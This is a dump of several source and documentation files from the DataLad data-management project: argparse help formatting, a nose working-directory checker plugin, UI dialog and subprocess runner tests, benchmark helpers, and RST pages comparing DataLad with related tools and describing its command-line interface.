_mk_description(self, parser):\n desc = parser.description\n if not desc:\n return ''\n return 'Description\\n-----------\\n%s\\n' % self._markup(desc)\n\n def _mk_footer(self, sections):\n if not hasattr(sections, '__iter__'):\n return ''\n\n footer = []\n for section, value in sections.items():\n part = \"\\n{0}\\n{1}\\n{2}\\n\".format(\n section,\n '-' * len(section),\n value)\n footer.append(part)\n\n return '\\n'.join(footer)\n\n def _mk_options(self, parser):\n\n # this non-obvious maneuver is really necessary!\n formatter = self.__class__(self._prog)\n\n # positionals, optionals and user-defined groups\n for action_group in parser._action_groups:\n formatter.start_section(None)\n formatter.add_text(None)\n formatter.add_arguments(action_group._group_actions)\n formatter.end_section()\n\n # epilog\n formatter.add_text(parser.epilog)\n\n # determine help from format above\n option_sec = formatter.format_help()\n\n return '\\n\\nOptions\\n-------\\n{0}'.format(option_sec)\n\n def _format_action(self, action):\n # determine the required width and the entry label\n action_header = self._format_action_invocation(action, doubledash='-\\\\-')\n\n if action.help:\n help_text = self._expand_help(action)\n help_lines = self._split_lines(help_text, 80)\n help = ' '.join(help_lines)\n else:\n help = ''\n\n # return a single string\n return '{0}\\n{1}\\n{2}\\n\\n'.format(\n action_header,\n\n '~' * len(action_header),\n help)\n\n\ndef cmdline_example_to_rst(src, out=None, ref=None):\n if out is None:\n from io import StringIO\n out = StringIO()\n\n # place header\n out.write('.. AUTO-GENERATED FILE -- DO NOT EDIT!\\n\\n')\n if ref:\n # place cross-ref target\n out.write('.. {0}:\\n\\n'.format(ref))\n\n # parser status vars\n inexample = False\n incodeblock = False\n\n for line in src:\n if line.startswith('#% EXAMPLE START'):\n inexample = True\n incodeblock = False\n continue\n if not inexample:\n continue\n if line.startswith('#% EXAMPLE END'):\n break\n if not inexample:\n continue\n if line.startswith('#%'):\n incodeblock = not incodeblock\n if incodeblock:\n out.write('\\n.. code-block:: sh\\n\\n')\n continue\n if not incodeblock and line.startswith('#'):\n out.write(line[(min(2, len(line) - 1)):])\n continue\n if incodeblock:\n if not line.rstrip().endswith('#% SKIP'):\n out.write(' %s' % line)\n continue\n if not len(line.strip()):\n continue\n else:\n raise RuntimeError(\"this should not happen\")\n\n return out\n" }, { "alpha_fraction": 0.581993579864502, "alphanum_fraction": 0.5824528932571411, "avg_line_length": 22.923076629638672, "blob_id": "f424add999d6bef0997bf6fea838d8b3d405d376", "content_id": "3522511389a0732453362132d5210e34a6d1dfc6", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2177, "license_type": "permissive", "max_line_length": 75, "num_lines": 91, "path": "/tools/checkpwd.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\"\"\"\nCheck which test did not come back to initial directory and fail right away\nwhen detected.\n\nCould be used as easy as replacement of `python -m nose ...`, with\n`python checkpwd.py --with-checkpwd ...`\n\"\"\"\n\nimport os\nfrom os import path as op\nimport logging\nfrom nose.plugins.base import Plugin\nfrom nose.util import src, tolist\n\nlog = logging.getLogger(__name__)\n\n\ndef getpwd():\n \"\"\"Try to return a CWD without dereferencing possible symlinks\n\n If no PWD found in the env, output of getcwd() is returned\n \"\"\"\n cwd = os.getcwd()\n try:\n env_pwd = os.environ['PWD']\n from datalad.utils import Path\n if Path(env_pwd).resolve() != Path(cwd).resolve():\n # uses os.chdir directly, pwd is not updated\n # could be an option to fail (tp not allow direct chdir)\n return cwd\n return env_pwd\n except KeyError:\n return cwd\n\n\nclass CheckPWD(Plugin):\n \"\"\"\n Activate a coverage report using Ned Batchelder's coverage module.\n \"\"\"\n name = 'checkpwd'\n\n def options(self, parser, env):\n \"\"\"\n Add options to command line.\n \"\"\"\n # throw_exception = True\n super(CheckPWD, self).options(parser, env)\n\n def configure(self, options, conf):\n \"\"\"\n Configure plugin.\n \"\"\"\n super(CheckPWD, self).configure(options, conf)\n self._pwd = getpwd()\n print(\"Initial PWD: %s\" % self._pwd)\n\n def beforeTest(self, *args, **kwargs):\n \"\"\"\n Begin recording coverage information.\n \"\"\"\n assert getpwd() == self._pwd\n\n def afterTest(self, *args, **kwargs):\n \"\"\"\n Stop recording coverage information.\n \"\"\"\n pwd = getpwd()\n # print(\"Checking %s\" % pwd)\n print(\"PWD: %s\" % pwd)\n assert pwd == self._pwd, \\\n \"PWD original:%s current: %s (after %s)\" \\\n % (self._pwd, pwd, args[0])\n\n\ndef test_ok():\n pass\n\n\ndef test_fail():\n os.chdir('/dev')\n\n\ndef test_fail_not_again():\n # will never reach here if test_fail fails\n pass\n\n\nif __name__ == '__main__':\n import nose\n nose.main(addplugins=[CheckPWD()])\n" }, { "alpha_fraction": 0.6901451349258423, "alphanum_fraction": 0.6907563209533691, "avg_line_length": 54, "blob_id": "7f3d287637d8919777d6243f6ee6ef80192328f5", "content_id": "3d2e02158bfbe1e9caf5697e69265b8c8fd9a88f", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 6545, "license_type": "permissive", "max_line_length": 98, "num_lines": 119, "path": "/docs/source/related.rst", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "Delineation from related solutions\n**********************************\n\nTo our knowledge, there is no other effort with a scope as broad as DataLad's.\nDataLad aims to unify access to vast arrays of (scientific) data in a domain and\ndata modality agnostic fashion with as few and universally available software\ndependencies as possible.\n\nThe most comparable project regarding the idea of federating access to various\ndata providers is the iRODS_-based `INCF Dataspace`_ project. IRODS is a\npowerful, NSF-supported framework, but it requires non-trivial deployment and\nmanagement procedures. As a representative of *data grid* technology, it is\nmore suitable for an institutional deployment, as data access, authentication,\npermission management, and versioning are complex and not-feasible to be\nperformed directly by researchers. DataLad on the other hand federates\ninstitutionally hosted data, but in addition enables individual researchers and\nsmall labs to contribute datasets to the federation with minimal cost and\nwithout the need for centralized coordination and permission management.\n\n.. _IRODS: https://irods.org\n.. _INCF Dataspace: http://www.incf.org/resources/data-space\n\n\nData catalogs\n=============\n\nExisting data-portals, such as DataDryad_, or domain-specific ones (e.g. `Human\nConnectome`_, OpenfMRI_), concentrate on collecting, cataloging, and making\ndata available. They offer an abstraction from local data management\npeculiarities (organization, updates, sharing). Ad-hoc collections of pointers\nto available data, such as `reddit datasets`_ and `Inside-R datasets`_, do not\nprovide any unified interface to assemble and manage such data. Data portals\ncan be used as seed information and data providers for DataLad. These portals\ncould in turn adopt DataLad to expose readily usable data collections via a\nfederated infrastructure.\n\n.. _Human Connectome: http://www.humanconnectomeproject.org\n.. _OpenfMRI: http://openfmri.org\n.. _DataDryad: http://datadryad.org\n.. _reddit datasets: http://www.reddit.com/r/datasets\n.. _Inside-R datasets: http://www.inside-r.org/howto/finding-data-internet\n\n\nData delivery/management middleware\n===================================\n\nEven though there are projects to manage data directly with dVCS (e.g. Git),\nsuch as the `Rdatasets Git repository`_ this approach does not scale, for example\nto the amount of data typically observed in a scientific context. DataLad\nuses git-annex_ to support managing large amounts of data with Git, while\navoiding the scalability issues of putting data directly into Git repositories.\n\nIn scientific software development, frequently using Git for source code\nmanagement, many projects are also confronted with the problem of managing\nlarge data arrays needed, for example, for software testing. An exemplar\nproject is `ITK Data`_ which is conceptually similar to git-annex: data content\nis referenced by unique keys (checksums), which are made redundantly available\nthrough multiple remote key-store farms and can be obtained using specialized\nfunctionality in the CMake software build system. However, the scope of this\nproject is limited to software QA, and only provides an ad-hoc collection of\nguidelines and supporting scripts.\n\n.. _Rdatasets Git repository: http://github.com/vincentarelbundock/Rdatasets\n.. _ITK Data: http://www.itk.org/Wiki/ITK/Git/Develop/Data\n\nThe git-annex website provides a comparison_ of Git-annex to other available\ndistributed data management tools, such as git-media_, git-fat_, and others.\nNone of the alternative frameworks provides all of the features of git-annex,\nsuch as integration with native Git workflows, distributed redundant storage,\nand partial checkouts in one project. Additional features of git-annex which\nare not necessarily needed by DataLad (git-annex assistant, encryption support,\netc.) make it even more appealing for extended coverage of numerous scenarios.\nMoreover, neither of the alternative solutions has already reached a maturity,\navailability, and level of adoption that would be comparable to that of\ngit-annex.\n\n.. _git-annex: http://git-annex.branchable.com\n.. _comparison: http://git-annex.branchable.com/not\n.. _git-media: https://github.com/schacon/git-media\n.. _git-fat: https://github.com/jedbrown/git-fat\n\n.. _chap-git-annex-datalad-comparison:\n\nGit/Git-annex/DataLad\n=====================\n\nAlthough it is possible, and intended, to use DataLad without ever invoking git\nor git-annex commands directly, it is useful to appreciate that DataLad is\nbuild atop of very flexible and powerful tools. Knowing basics of git and\ngit-annex in addition to DataLad helps to not only make better use of\nDataLad but also to enable more advanced and more efficient data management\nscenarios. DataLad makes use of lower-level configuration and data structures\nas much as possible. Consequently, it is possible to manipulate DataLad\ndatasets with low-level tools if needed. Moreover, DataLad datasets are\ncompatible with tools and services designed to work with plain Git repositories,\nsuch as the popular GitHub_ service.\n\n.. _github: https://github.com\n\nTo better illustrate the different scopes, the following table provides an\noverview of the features that are contributed by each software technology\nlayer.\n\n================================================ ============= =============== ==============\nFeature Git Git-annex DataLad\n================================================ ============= =============== ==============\nVersion control (text, code) |tup| |tup| can mix |tup| can mix\nVersion control (binary data) (not advised) |tup| |tup|\nAuto-crawling available resources |tup| RSS feeds |tup| flexible\nUnified dataset handling |tup|\n- recursive operation on datasets |tup|\n- seamless operation across datasets boundaries |tup|\n- meta-data support |tup| per-file |tup|\n- meta-data aggregation |tup| flexible\nUnified authentication interface |tup|\n================================================ ============= =============== ==============\n\n.. |tup| unicode:: U+2713 .. check mark\n :trim:\n" }, { "alpha_fraction": 0.5684126019477844, "alphanum_fraction": 0.5762960910797119, "avg_line_length": 34.63809585571289, "blob_id": "d78486de7ec65c7a6c8241f97fd17f1b6abd0125", "content_id": "ecd2b5018d0fb0c6efeff8f9074e40dc6ce33930", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7484, "license_type": "permissive", "max_line_length": 97, "num_lines": 210, "path": "/datalad/ui/tests/test_dialog.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"tests for dialog UI \"\"\"\n\n__docformat__ = 'restructuredtext'\n\nimport builtins\nfrom io import StringIO\nfrom unittest.mock import (\n call,\n patch,\n)\n\nimport pytest\n\nfrom datalad.ui.progressbars import progressbars\nfrom datalad.utils import swallow_logs\n\nfrom ...tests.utils_pytest import (\n assert_in,\n assert_not_in,\n assert_raises,\n assert_re_in,\n eq_,\n ok_endswith,\n ok_startswith,\n)\nfrom ..dialog import (\n ConsoleLog,\n DialogUI,\n IPythonUI,\n)\n\n\ndef patch_input(**kwargs):\n \"\"\"A helper to provide mocked cm patching input function which was renamed in PY3\"\"\"\n return patch.object(builtins, 'input', **kwargs)\n\n\ndef patch_getpass(**kwargs):\n return patch('getpass.getpass', **kwargs)\n\n\ndef test_yesno():\n for expected_value, defaults in {True: ('yes', True),\n False: ('no', False)}.items():\n for d in defaults:\n with patch_getpass(return_value=''):\n out = StringIO()\n response = DialogUI(out=out).yesno(\"?\", default=d)\n eq_(response, expected_value)\n\n\ndef test_question_choices():\n\n # TODO: come up with a reusable fixture for testing here\n\n choices = {\n 'a': '[a], b, cc',\n 'b': 'a, [b], cc',\n 'cc': 'a, b, [cc]'\n }\n\n for hidden in (True, False):\n for default_value in ['a', 'b']:\n choices_str = choices[default_value]\n for entered_value, expected_value in [(default_value, default_value),\n ('', default_value),\n ('cc', 'cc')]:\n with patch_getpass(return_value=entered_value) as gpcm:\n out = StringIO()\n response = DialogUI(out=out).question(\n \"prompt\", choices=sorted(choices), default=default_value,\n hidden=hidden\n )\n # .assert_called_once() is not available on older mock's\n # e.g. on 1.3.0 on nd16.04\n eq_(gpcm.call_count, 1) # should have asked only once\n eq_(response, expected_value)\n # getpass doesn't use out -- goes straight to the terminal\n eq_(out.getvalue(), '')\n # TODO: may be test that the prompt was passed as a part of the getpass arg\n #eq_(out.getvalue(), 'prompt (choices: %s): ' % choices_str)\n\n # check some expected exceptions to be thrown\n out = StringIO()\n ui = DialogUI(out=out)\n assert_raises(ValueError, ui.question, \"prompt\", choices=['a'], default='b')\n eq_(out.getvalue(), '')\n\n with patch_getpass(return_value='incorrect'):\n assert_raises(RuntimeError, ui.question, \"prompt\", choices=['a', 'b'])\n assert_re_in(\".*ERROR: .incorrect. is not among choices.*\", out.getvalue())\n\n\ndef test_hidden_doubleentry():\n # In above test due to 'choices' there were no double entry for a hidden\n out = StringIO()\n ui = DialogUI(out=out)\n with patch_getpass(return_value='ab') as gpcm:\n response = ui.question(\n \"?\", hidden=True)\n eq_(response, 'ab')\n gpcm.assert_has_calls([call('?: '), call('? (repeat): ')])\n\n # explicitly request no repeats\n with patch_getpass(return_value='ab') as gpcm:\n response = ui.question(\n \"?\", hidden=True, repeat=False)\n eq_(response, 'ab')\n gpcm.assert_has_calls([call('?: ')])\n\n\[email protected](\"backend\", progressbars)\[email protected](\"len\", [0, 4, 10, 1000])\[email protected](\"increment\", [True, False])\ndef test_progress_bar(backend, len, increment):\n # More of smoke testing given various lengths of fill_text\n out = StringIO()\n fill_str = ('123456890' * (len//10))[:len]\n pb = DialogUI(out).get_progressbar(\n 'label', fill_str, total=10, backend=backend)\n pb.start()\n # we can't increment 11 times\n SILENT_BACKENDS = ('annex-remote', 'silent', 'none')\n ONLY_THE_END_BACKENDS = ('log',)\n for x in range(11):\n if not (increment and x == 0):\n # do not increment on 0\n pb.update(x if not increment else 1, increment=increment)\n #out.flush() # needed atm... no longer?\n # Progress bar is having 0.1 sec between updates by default, so\n # we could either sleep:\n #import time; time.sleep(0.1)\n # or just force the refresh\n pb.refresh()\n pstr = out.getvalue()\n if backend not in SILENT_BACKENDS + ONLY_THE_END_BACKENDS: # no str repr\n ok_startswith(pstr.lstrip('\\r'), 'label:')\n assert_re_in(r'.*\\b%d%%.*' % (10*x), pstr)\n if backend == 'progressbar':\n assert_in('ETA', pstr)\n pb.finish()\n output = out.getvalue()\n if backend not in SILENT_BACKENDS:\n # returns back and there is no spurious newline\n if output:\n ok_endswith(output, '\\r')\n\n\ndef test_IPythonUI():\n # largely just smoke tests to see if nothing is horribly bad\n with patch_input(return_value='a'):\n out = StringIO()\n response = IPythonUI(out=out).question(\n \"prompt\", choices=sorted(['b', 'a'])\n )\n eq_(response, 'a')\n eq_(out.getvalue(), 'prompt (choices: a, b): ')\n\n ui = IPythonUI()\n pbar = ui.get_progressbar(total=10)\n assert_in('notebook', str(pbar._tqdm))\n\n\ndef test_silent_question():\n # SilentConsoleLog must not be asked questions.\n # If it is asked, RuntimeError would be thrown with details to help\n # troubleshooting WTF is happening\n from ..dialog import SilentConsoleLog\n ui = SilentConsoleLog()\n with assert_raises(RuntimeError) as cme:\n ui.question(\"could you help me\", title=\"Pretty please\")\n assert_in('question: could you help me. Title: Pretty please.', str(cme.value))\n\n with assert_raises(RuntimeError) as cme:\n ui.question(\"could you help me\", title=\"Pretty please\", choices=['secret1'], hidden=True)\n assert_in('question: could you help me. Title: Pretty please.', str(cme.value))\n assert_not_in('secret1', str(cme.value))\n assert_in('not shown', str(cme.value))\n\n # additional kwargs, no title, choices\n with assert_raises(RuntimeError) as cme:\n ui.question(\"q\", choices=['secret1'])\n assert_in('secret1', str(cme.value))\n\n\n@patch(\"datalad.log.is_interactive\", lambda: False)\ndef test_message_pbar_state_logging_is_demoted():\n from datalad.log import LoggerHelper\n\n name = \"dl-test\"\n lgr = LoggerHelper(name).get_initialized_logger()\n ui = ConsoleLog()\n\n with patch(\"datalad.log.lgr\", lgr):\n with swallow_logs(name=name, new_level=20) as cml:\n ui.message(\"testing 0\")\n assert_not_in(\"Clear progress bars\", cml.out)\n assert_not_in(\"Refresh progress bars\", cml.out)\n with swallow_logs(name=name, new_level=5) as cml:\n ui.message(\"testing 1\")\n assert_in(\"Clear progress bars\", cml.out)\n assert_in(\"Refresh progress bars\", cml.out)\n" }, { "alpha_fraction": 0.6129560470581055, "alphanum_fraction": 0.6199719309806824, "avg_line_length": 28.902097702026367, "blob_id": "d6cefeee9ae6baea4f71604807ae6f218699b2f2", "content_id": "937fa0757f548c6cc1a173f065846a5bc2cd6d91", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4276, "license_type": "permissive", "max_line_length": 106, "num_lines": 143, "path": "/datalad/runner/tests/test_generatormixin.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "from __future__ import annotations\n\nimport sys\nfrom queue import Queue\nfrom typing import (\n Any,\n Optional,\n)\n\nfrom datalad.runner.coreprotocols import (\n NoCapture,\n StdOutErrCapture,\n)\nfrom datalad.runner.nonasyncrunner import (\n _ResultGenerator,\n run_command,\n)\nfrom datalad.runner.protocol import GeneratorMixIn\nfrom datalad.tests.utils_pytest import (\n assert_equal,\n assert_raises,\n)\n\nfrom ..exception import CommandError\nfrom ..runner import WitlessRunner\nfrom .utils import py2cmd\n\n\nclass TestProtocol(GeneratorMixIn, StdOutErrCapture):\n\n __test__ = False # class is not a class of tests\n\n def __init__(self,\n done_future: Any = None,\n encoding: Optional[str] = None) -> None:\n\n StdOutErrCapture.__init__(\n self,\n done_future=done_future,\n encoding=encoding)\n GeneratorMixIn.__init__(self)\n\n def pipe_data_received(self, fd: int, data: bytes) -> None:\n self.send_result((fd, data.decode()))\n\n\ndef test_generator_mixin_basic() -> None:\n\n stdin_queue: Queue[Optional[bytes]] = Queue()\n\n i = 0\n for fd, data in run_command([sys.executable, \"-i\", \"-\"], TestProtocol, stdin_queue):\n if i > 10:\n stdin_queue.put(b\"exit(0)\\n\")\n stdin_queue.put(None)\n else:\n stdin_queue.put(f\"print({i}*{i})\\n\".encode())\n i += 1\n\n\ndef test_generator_mixin_runner() -> None:\n\n stdin_queue: Queue[Optional[bytes]] = Queue()\n\n runner = WitlessRunner()\n i = 0\n for fd, data in runner.run(cmd=[sys.executable, \"-i\", \"-\"], protocol=TestProtocol, stdin=stdin_queue):\n if i > 10:\n stdin_queue.put(b\"exit(0)\\n\")\n stdin_queue.put(None)\n else:\n stdin_queue.put(f\"print({i}*{i})\\n\".encode())\n i += 1\n\n\ndef test_post_pipe_callbacks() -> None:\n # Expect that the process_exited and connection_lost callbacks\n # are also called in a GeneratorMixIn protocol\n class TestPostPipeProtocol(GeneratorMixIn, StdOutErrCapture):\n def __init__(self) -> None:\n GeneratorMixIn.__init__(self)\n StdOutErrCapture.__init__(self)\n\n def process_exited(self) -> None:\n self.send_result(1)\n self.send_result(2)\n\n def connection_lost(self, exc: Optional[BaseException]) -> None:\n self.send_result(3)\n self.send_result(4)\n\n runner = WitlessRunner()\n results = list(runner.run(cmd=[\"echo\", \"a\"], protocol=TestPostPipeProtocol))\n assert_equal(results, [1, 2, 3, 4])\n\n\ndef test_file_number_activity_detection() -> None:\n # Expect an output queue that just has the process exit notification.\n # empty output queue without active threads\n # waits for the process and progresses the generator state\n # to `_ResultGenerator.GeneratorState.process_exited`.\n class TestFNADProtocol(GeneratorMixIn, NoCapture):\n def __init__(self) -> None:\n GeneratorMixIn.__init__(self)\n NoCapture.__init__(self)\n\n def process_exited(self) -> None:\n self.send_result(3)\n\n def connection_lost(self, exc: Optional[BaseException]) -> None:\n self.send_result(4)\n\n wl_runner = WitlessRunner()\n result_generator = wl_runner.run(cmd=[\"echo\", \"a\"], protocol=TestFNADProtocol)\n assert isinstance(result_generator, _ResultGenerator)\n\n runner = result_generator.runner\n output_queue = runner.output_queue\n assert len(result_generator.runner.active_file_numbers) == 1\n while runner.should_continue():\n runner.process_queue()\n\n # Expect process exited and connection lost to be called.\n assert_equal(result_generator.send(None), 3)\n assert_equal(result_generator.send(None), 4)\n assert_raises(StopIteration, result_generator.send, None)\n\n\ndef test_failing_process():\n class TestProtocol(GeneratorMixIn, NoCapture):\n def __init__(self) -> None:\n GeneratorMixIn.__init__(self)\n NoCapture.__init__(self)\n\n try:\n for _ in run_command(py2cmd(\"exit(1)\"),\n protocol=TestProtocol,\n stdin=None):\n pass\n assert_equal(1, 2)\n except CommandError:\n return\n assert_equal(2, 3)\n" }, { "alpha_fraction": 0.5930588245391846, "alphanum_fraction": 0.603488564491272, "avg_line_length": 33.3271598815918, "blob_id": "e58338da9a02065edbb68385f87caa97ca00f16a", "content_id": "5f2620d295d35a77a0f896fba326e6834ed58b3b", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5561, "license_type": "permissive", "max_line_length": 103, "num_lines": 162, "path": "/benchmarks/common.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# ex: set sts=4 ts=4 sw=4 noet:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Helpers for benchmarks of DataLad\"\"\"\n\nimport os\nimport sys\nimport tarfile\nimport tempfile\nimport timeit\nimport os.path as op\nfrom glob import glob\n\nfrom datalad.utils import (\n getpwd,\n get_tempfile_kwargs,\n rmtree,\n)\n\nfrom datalad.api import (\n Dataset,\n create_test_dataset,\n)\n\n############\n# Monkey patches\n\n# Robust is_interactive. Should be not needed since 0.11.4\n# https://github.com/datalad/datalad/pull/3268\ndef _is_stream_tty(stream):\n try:\n # TODO: check on windows if hasattr check would work correctly and\n # add value:\n return stream.isatty()\n except ValueError as exc:\n # Who knows why it is a ValueError, but let's try to be specific\n # If there is a problem with I/O - non-interactive, otherwise reraise\n if \"I/O\" in str(exc):\n return False\n raise\n\n\ndef is_interactive():\n \"\"\"Return True if all in/outs are tty\"\"\"\n return all(_is_stream_tty(s) for s in (sys.stdin, sys.stdout, sys.stderr))\n\n\nclass SuprocBenchmarks(object):\n # manually set a number since otherwise takes way too long!\n # see https://github.com/spacetelescope/asv/issues/497\n #number = 3\n # although seems to work ok with a timer which accounts for subprocesses\n\n # custom timer so we account for subprocess times\n timer = timeit.default_timer\n\n _monkey_patched = False\n\n def __init__(self):\n if not self._monkey_patched:\n # monkey patch things if needed\n # ASV started to close one of the std streams since some point\n # which caused our is_interactive to fail. We need to provide\n # more robust version\n from datalad.support.external_versions import external_versions\n # comparing to 0.12.1 since the returned version is \"loose\"\n # so fails correctly identify rc as pre .0\n if external_versions['datalad'] < '0.12.1':\n from datalad import utils\n from datalad.api import ls\n utils.is_interactive = is_interactive\n ls.is_interactive = is_interactive\n SuprocBenchmarks._monkey_patched = True\n self.remove_paths = []\n\n def _cleanup(self):\n if not self.remove_paths:\n return # Nothing TODO\n self.log(\"Cleaning up %d paths\", len(self.remove_paths))\n while self.remove_paths:\n path = self.remove_paths.pop()\n if op.lexists(path):\n rmtree(path)\n\n def teardown(self):\n self._cleanup()\n\n def __del__(self):\n # We will at least try\n try:\n self._cleanup()\n except:\n pass\n\n def log(self, msg, *args):\n \"\"\"Consistent benchmarks logging\"\"\"\n print(\"BM: \"+ str(msg % tuple(args)))\n\n\nclass SampleSuperDatasetBenchmarks(SuprocBenchmarks):\n \"\"\"\n Setup a sample hierarchy of datasets to be used\n \"\"\"\n\n timeout = 3600\n # need to assure that we are working in a different repository now\n # see https://github.com/datalad/datalad/issues/1512\n # might not be sufficient due to side effects between tests and\n # thus getting into the same situation\n ds_count = 0\n\n # Creating in CWD so things get removed when ASV is done\n # https://asv.readthedocs.io/en/stable/writing_benchmarks.html\n # that is where it would be run and cleaned up after\n\n dsname = 'testds1'\n tarfile = 'testds1.tar'\n\n def setup_cache(self):\n ds_path = create_test_dataset(\n self.dsname\n , spec='2/-2/-2'\n , seed=0\n )[0]\n self.log(\"Setup cache ds path %s. CWD: %s\", ds_path, getpwd())\n # Will store into a tarfile since otherwise install -r is way too slow\n # to be invoked for every benchmark\n # Store full path since apparently setup is not ran in that directory\n self.tarfile = op.realpath(SampleSuperDatasetBenchmarks.tarfile)\n with tarfile.open(self.tarfile, \"w\") as tar:\n # F.CK -- Python tarfile can't later extract those because key dirs are\n # read-only. For now just a workaround - make it all writeable\n from datalad.utils import rotree\n rotree(self.dsname, ro=False, chmod_files=False)\n tar.add(self.dsname, recursive=True)\n rmtree(self.dsname)\n\n def setup(self):\n self.log(\"Setup ran in %s, existing paths: %s\", getpwd(), glob('*'))\n\n tempdir = tempfile.mkdtemp(\n **get_tempfile_kwargs({}, prefix=\"bm\")\n )\n self.remove_paths.append(tempdir)\n with tarfile.open(self.tarfile) as tar:\n # note: not a concern for CVE-2007-4559 since we are the ones mastering\n # content for the tar here. See https://github.com/datalad/datalad/pull/7104\n # for more information.\n tar.extractall(tempdir)\n\n # TODO -- remove this abomination after https://github.com/datalad/datalad/issues/1512 is fixed\n epath = op.join(tempdir, 'testds1')\n epath_unique = epath + str(self.__class__.ds_count)\n os.rename(epath, epath_unique)\n self.__class__.ds_count += 1\n self.ds = Dataset(epath_unique)\n self.repo = self.ds.repo\n self.log(\"Finished setup for %s\", tempdir)\n" }, { "alpha_fraction": 0.5180374979972839, "alphanum_fraction": 0.5216450095176697, "avg_line_length": 31.23255729675293, "blob_id": "e6e4b76e42e6fa71092373b7c5f2337205af6f00", "content_id": "5ba85e7c47b6af53e305bf35cd88876227249823", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1386, "license_type": "permissive", "max_line_length": 87, "num_lines": 43, "path": "/datalad/ui/base.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Base classes for UI\n\n\"\"\"\n\n__docformat__ = 'restructuredtext'\n\nfrom abc import ABCMeta, abstractmethod\n\nfrom ..utils import auto_repr\n\n\n@auto_repr\nclass InteractiveUI(object, metaclass=ABCMeta):\n \"\"\"Semi-abstract class for interfaces to implement interactive UI\"\"\"\n\n @abstractmethod\n def question(self, text,\n title=None, choices=None,\n default=None,\n hidden=False,\n repeat=None):\n pass\n\n def yesno(self, *args, **kwargs):\n # Provide some default sugaring\n default = kwargs.pop('default', None)\n if default is not None:\n if default in {True}:\n default = 'yes'\n elif default in {False}:\n default = 'no'\n kwargs['default'] = default\n response = self.question(*args, choices=['yes', 'no'], **kwargs).rstrip('\\n')\n assert response in {'yes', 'no'}, \"shouldn't happen; question() failed\"\n return response == 'yes'\n" }, { "alpha_fraction": 0.7429801821708679, "alphanum_fraction": 0.7467240691184998, "avg_line_length": 39.462120056152344, "blob_id": "f48c3712146e84c84125ec98387cacf7208c5dde", "content_id": "6f5ce023aa0b09bd4fc5312718a3be6298d291eb", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 5342, "license_type": "permissive", "max_line_length": 79, "num_lines": 132, "path": "/docs/source/design/cli.rst", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": ".. -*- mode: rst -*-\n.. vi: set ft=rst sts=4 ts=4 sw=4 et tw=79:\n\n.. _chap_design_cli:\n\n**********************\nCommand line interface\n**********************\n\n.. topic:: Specification scope and status\n\n This incomplete specification describes the current implementation.\n\nThe command line interface (CLI) implementation is located at ``datalad.cli``.\nIt provides a console entry point that automatically constructs an\n``argparse``-based command line parser, which is used to make adequately\nparameterized calls to the targeted command implementations. It also performs\nerror handling. The CLI automatically supports all commands, regardless of\nwhether they are provided by the core package, or by extensions. It only\nrequires them to be discoverable via the respective extension entry points,\nand to implement the standard :class:`datalad.interface.base.Interface`.\n\n\nBasic workflow of a command line based command execution\n========================================================\n\nThe functionality of the main command line entrypoint described here is\nimplemented in ``datalad.cli.main``.\n\n1. Construct an ``argparse`` parser.\n\n - this is happening with inspection of the actual command line arguments\n in order to avoid needless processing\n\n - when insufficient arguments or other errors are detected, the CLI will\n fail informatively already at this stage\n\n2. Detect argument completions events, and utilize the parser in a optimized\n fashion for this purpose.\n\n3. Determine the to-be-executed command from the given command line arguments.\n\n4. Read any configuration overrides from the command line arguments.\n\n5. Change the process working directory, if requested.\n\n6. Execute the target command in one of two modes:\n\n a. With a basic exception handler\n\n b. With an exception hook setup that enables dropping into a debugger\n for any exception that reaches the command line ``main()`` routine.\n\n7. Unless a debugger is utilized, five error categories are distinguished\n (in the order given below):\n\n 1. Insufficient arguments (exit code 2)\n\n A command was called with inadequate or incomplete parameters.\n\n 2. Incomplete results (exit code 1)\n\n While processing an error occurred.\n\n 3. A specific internal shell command execution failed (exit code relayed\n from underlying command)\n\n The error is reported, as if the command would have been executed\n directly in the command line. Its output is written to the ``stdout``,\n ``stderr`` streams, and the exit code of the DataLad process matches\n the exit code of the underlying command.\n\n 4. Keyboard interrupt (exit code 3)\n\n The process was interrupted by the equivalent of a user hitting\n ``Ctrl+C``.\n\n 5. Any other error/exception.\n\n\nCommand parser construction by ``Interface`` inspection\n=======================================================\n\nThe parser setup described here is implemented in ``datalad.cli.parser``.\n\nA dedicated sub-parser for any relevant DataLad command is constructed. 